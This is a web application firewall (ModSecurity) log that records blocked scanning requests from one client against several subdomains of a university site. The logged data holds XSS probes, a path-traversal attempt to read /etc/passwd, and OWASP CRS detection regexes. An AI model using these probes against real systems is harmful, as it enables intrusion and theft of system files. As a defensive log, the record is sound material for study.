[Tue Aug 29 11:56:14.976629 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16bsCo-f0AAArC7iQAAAAW"]
[Tue Aug 29 11:56:15.168940 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAocyfgAAAAR"]
[Tue Aug 29 11:56:15.169240 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAAolK04AAAAe"]
[Tue Aug 29 11:56:15.170386 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAApbUyUAAAAh"]
[Tue Aug 29 11:56:15.191339 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArB1zYAAAAV"]
[Tue Aug 29 11:56:15.191717 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAq@sigAAAAM"]
[Tue Aug 29 11:56:15.192066 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAApHRmMAAAAP"]
[Tue Aug 29 11:56:15.212242 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16b8Co-f0AAAocyfoAAAAR"]
[Tue Aug 29 11:56:15.219698 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAApHRmQAAAAP"]
[Tue Aug 29 11:56:15.559565 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAApXgtsAAAAU"]
[Tue Aug 29 11:56:15.592119 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8cAAAAI"]
[Tue Aug 29 11:56:15.658693 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8kAAAAI"]
[Tue Aug 29 11:56:15.660385 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArC7ioAAAAW"]
[Tue Aug 29 11:56:15.677181 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAocyf8AAAAR"]
[Tue Aug 29 11:56:15.685243 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq5@OgAAAAK"]
[Tue Aug 29 11:56:15.696434 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAocygAAAAAR"]
[Tue Aug 29 11:56:16.777539 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16cMCo-f0AAAocygEAAAAR"]
[Tue Aug 29 11:56:16.780522 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16cMCo-f0AAAq3a8wAAAAI"]
[Tue Aug 29 11:56:16.857504 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAAqeFl0AAAAx"]
[Tue Aug 29 11:56:16.876143 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAArC7i4AAAAW"]
[Tue Aug 29 11:56:17.091572 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7jEAAAAW"]
[Tue Aug 29 11:56:17.133006 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAApHRmgAAAAP"]
[Tue Aug 29 11:56:17.152562 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq5@OsAAAAK"]
[Tue Aug 29 11:56:17.156784 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq2KgcAAAAE"]
[Tue Aug 29 11:56:17.157412 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAAq3a84AAAAI"]
